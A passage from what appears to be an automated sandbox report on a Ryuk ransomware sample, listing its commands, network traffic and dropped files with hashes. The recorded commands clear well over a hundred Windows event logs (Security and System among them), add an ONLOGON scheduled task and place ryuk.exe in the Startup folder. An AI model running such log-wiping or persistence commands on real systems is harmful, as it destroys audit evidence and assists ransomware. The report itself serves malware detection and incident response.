C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-TunnelDriver"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UAC/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WFP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WFP/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WUSA/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/Power"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/Render"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinRM/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WinRM/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ntshrui"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "OAlerts"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Security"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Setup"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "System"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "TabletPC_InputPanel_Channel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "WMPSetup"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "WMPSyncEngine"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Windows PowerShell"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "muxencode"

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe" --reenable-autoupdates --system-level

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x13c,0x140,0x144,0x110,0x148,0x13ff4a890,0x13ff4a8a0,0x13ff4a8b0

Network

Country Destination Domain Proto
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 clients2.google.com udp
NL 142.250.179.174:443 clients2.google.com tcp
NL 172.217.168.237:443 accounts.google.com tcp
US 8.8.8.8:53 edgedl.me.gvt1.com udp
US 34.104.35.123:80 edgedl.me.gvt1.com tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.4.4:443 dns.google udp
NL 142.250.179.142:443 apis.google.com tcp
NL 142.251.39.110:443 tcp
NL 142.251.39.110:443 encrypted-tbn0.gstatic.com tcp
NL 142.251.39.110:443 udp
US 8.8.8.8:443 dns.google udp
NL 142.250.179.138:443 translate.googleapis.com tcp
NL 142.250.179.138:443 udp
NL 142.250.179.138:443 translate.googleapis.com tcp
NL 142.250.179.138:443 translate.googleapis.com tcp
NL 142.250.179.138:443 udp
NL 142.251.36.14:443 tcp
NL 142.251.36.14:443 tcp
NL 142.250.179.142:443 consent.google.com tcp
NL 142.251.39.110:443 play.google.com tcp
NL 142.251.39.110:443 udp
NL 142.250.179.142:443 udp

Files

memory/2044-54-0x0000000000000000-mapping.dmp

memory/1044-55-0x0000000000000000-mapping.dmp

memory/1664-56-0x0000000000000000-mapping.dmp

C:\ProgramData\ryuk.exe

MD5 35194c73ff38dd6c3bed7c0efcff6826
SHA1 1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
SHA256 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
SHA512 cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

memory/1280-58-0x0000000000000000-mapping.dmp

memory/948-59-0x0000000000000000-mapping.dmp

memory/1924-60-0x0000000000000000-mapping.dmp

memory/1520-61-0x0000000000000000-mapping.dmp

memory/1536-62-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 35194c73ff38dd6c3bed7c0efcff6826
SHA1 1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
SHA256 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
SHA512 cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

memory/1324-64-0x0000000000000000-mapping.dmp

memory/1464-65-0x0000000000000000-mapping.dmp

memory/916-66-0x0000000000000000-mapping.dmp

memory/1104-67-0x0000000000000000-mapping.dmp

memory/680-68-0x0000000000000000-mapping.dmp

memory/1680-69-0x0000000000000000-mapping.dmp

memory/588-70-0x0000000000000000-mapping.dmp

memory/524-71-0x0000000000000000-mapping.dmp

memory/1296-72-0x0000000000000000-mapping.dmp

memory/1416-73-0x0000000000000000-mapping.dmp

memory/384-75-0x0000000000000000-mapping.dmp

memory/972-74-0x0000000000000000-mapping.dmp

memory/1236-76-0x0000000000000000-mapping.dmp

memory/564-78-0x0000000000000000-mapping.dmp

memory/1584-77-0x0000000000000000-mapping.dmp

memory/772-79-0x0000000000000000-mapping.dmp

memory/1124-80-0x0000000000000000-mapping.dmp

memory/1396-81-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 b7eaaa79506c974044170955cd107a41
SHA1 52c376a5e7b765f2406af179bf977f66d49f958d
SHA256 eb3729f6a660f3c84031db0bb3c93ac9069c635de31f7c8d91e019862c7c5661
SHA512 3283d31e86284b2a70e815e7dcc2de78d96492e01ac022572a3fb76399a5e5a156d1b2134fcbcd4798edacbc49fed42f4a51e43ea385b31116da7492ec02a4f9

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 4bb223dbe5df0e996ceaa51a63796432
SHA1 76c0682d79c79ae714e9163a872d194fe5fd1a15
SHA256 675500c11b1d08a862a7d6ac6faed972365641f263dbc1126efe52c28a23abb8
SHA512 65153752fa0e6aeb6889dee792e0fd01e87d1903d61e4d8e80a643c8a1507ee0e4228b890e7e994ccb9c2503ccb9877a219213bc38048271a3c17425c2d8fe11

C:\ProgramData\hrmlog1

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1780-85-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog2

MD5 b7eaaa79506c974044170955cd107a41
SHA1 52c376a5e7b765f2406af179bf977f66d49f958d
SHA256 eb3729f6a660f3c84031db0bb3c93ac9069c635de31f7c8d91e019862c7c5661
SHA512 3283d31e86284b2a70e815e7dcc2de78d96492e01ac022572a3fb76399a5e5a156d1b2134fcbcd4798edacbc49fed42f4a51e43ea385b31116da7492ec02a4f9

memory/1752-87-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 e493e117c57393d72febb5575ec7fb06
SHA1 69bab9b379a0b7a007b07b2d1a0fe93cf2662e28
SHA256 48f72717e4275a3f80dfd725d6db0b0366f1ae2ae61baa8d1882ae6117938b85
SHA512 228dbb3cdef8b906554a51128acf87db777869fa30324c3f5e56d9230176b304fbb3560cc35246ea0c3708438662d9886b116beeb9f54e5c03756b2d00a57c2c

C:\ProgramData\RYUKID

MD5 e493e117c57393d72febb5575ec7fb06
SHA1 69bab9b379a0b7a007b07b2d1a0fe93cf2662e28
SHA256 48f72717e4275a3f80dfd725d6db0b0366f1ae2ae61baa8d1882ae6117938b85
SHA512 228dbb3cdef8b906554a51128acf87db777869fa30324c3f5e56d9230176b304fbb3560cc35246ea0c3708438662d9886b116beeb9f54e5c03756b2d00a57c2c

C:\ProgramData\hrmlog2

MD5 b7eaaa79506c974044170955cd107a41
SHA1 52c376a5e7b765f2406af179bf977f66d49f958d
SHA256 eb3729f6a660f3c84031db0bb3c93ac9069c635de31f7c8d91e019862c7c5661
SHA512 3283d31e86284b2a70e815e7dcc2de78d96492e01ac022572a3fb76399a5e5a156d1b2134fcbcd4798edacbc49fed42f4a51e43ea385b31116da7492ec02a4f9

memory/1184-91-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog1

MD5 4bb223dbe5df0e996ceaa51a63796432
SHA1 76c0682d79c79ae714e9163a872d194fe5fd1a15
SHA256 675500c11b1d08a862a7d6ac6faed972365641f263dbc1126efe52c28a23abb8
SHA512 65153752fa0e6aeb6889dee792e0fd01e87d1903d61e4d8e80a643c8a1507ee0e4228b890e7e994ccb9c2503ccb9877a219213bc38048271a3c17425c2d8fe11

memory/1108-93-0x0000000000000000-mapping.dmp

C:\ProgramData\RyukReadMe.txt

MD5 3cfd6ef3b2825aa6ce421e10604ff452
SHA1 7c7c75df4105d3b0d69d1e03220f4d24644a8bde
SHA256 65adfc7e8a2bf62ec815a0aded844c1f0812576d655e523201b02ca5ffe3313d
SHA512 d6c130f880ae02ff9f1d08e4b8c825d42f0ea640bd74faf16841a13438976b5e41b94d6260da1622848c3197ad25f446064fd60264b62d992b87c780dbb693fc

memory/1548-95-0x0000000000000000-mapping.dmp

memory/832-96-0x0000000000000000-mapping.dmp

memory/2044-97-0x0000000000000000-mapping.dmp

memory/1280-98-0x0000000000000000-mapping.dmp

memory/1620-99-0x0000000000000000-mapping.dmp

memory/1472-100-0x0000000000000000-mapping.dmp

memory/1376-101-0x0000000000000000-mapping.dmp

memory/1792-102-0x0000000000000000-mapping.dmp

memory/576-103-0x000007FEFBF01000-0x000007FEFBF03000-memory.dmp

C:\RyukReadMe.txt

MD5 3cfd6ef3b2825aa6ce421e10604ff452
SHA1 7c7c75df4105d3b0d69d1e03220f4d24644a8bde
SHA256 65adfc7e8a2bf62ec815a0aded844c1f0812576d655e523201b02ca5ffe3313d
SHA512 d6c130f880ae02ff9f1d08e4b8c825d42f0ea640bd74faf16841a13438976b5e41b94d6260da1622848c3197ad25f446064fd60264b62d992b87c780dbb693fc

memory/1088-107-0x0000000000000000-mapping.dmp

memory/984-109-0x0000000000000000-mapping.dmp

memory/1580-108-0x0000000000000000-mapping.dmp

memory/1780-110-0x0000000000000000-mapping.dmp

memory/2008-111-0x0000000000000000-mapping.dmp

memory/1928-112-0x0000000000000000-mapping.dmp

memory/1516-113-0x0000000000000000-mapping.dmp

memory/1800-115-0x0000000000000000-mapping.dmp

memory/2024-122-0x0000000000000000-mapping.dmp

memory/1952-119-0x0000000000000000-mapping.dmp

memory/560-123-0x0000000000000000-mapping.dmp

memory/1524-126-0x0000000000000000-mapping.dmp

memory/1472-125-0x0000000000000000-mapping.dmp

memory/1948-124-0x0000000000000000-mapping.dmp

memory/1260-128-0x0000000000000000-mapping.dmp

memory/384-127-0x0000000000000000-mapping.dmp

memory/584-129-0x0000000000000000-mapping.dmp

memory/588-130-0x0000000000000000-mapping.dmp

memory/1128-131-0x0000000000000000-mapping.dmp

memory/1960-132-0x0000000000000000-mapping.dmp

memory/1696-134-0x0000000000000000-mapping.dmp

memory/1280-136-0x0000000000000000-mapping.dmp

memory/1092-135-0x0000000000000000-mapping.dmp

memory/860-137-0x0000000000000000-mapping.dmp

memory/1944-138-0x0000000000000000-mapping.dmp

C:\Users\Admin\RyukReadMe.txt

MD5 3cfd6ef3b2825aa6ce421e10604ff452
SHA1 7c7c75df4105d3b0d69d1e03220f4d24644a8bde
SHA256 65adfc7e8a2bf62ec815a0aded844c1f0812576d655e523201b02ca5ffe3313d
SHA512 d6c130f880ae02ff9f1d08e4b8c825d42f0ea640bd74faf16841a13438976b5e41b94d6260da1622848c3197ad25f446064fd60264b62d992b87c780dbb693fc

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
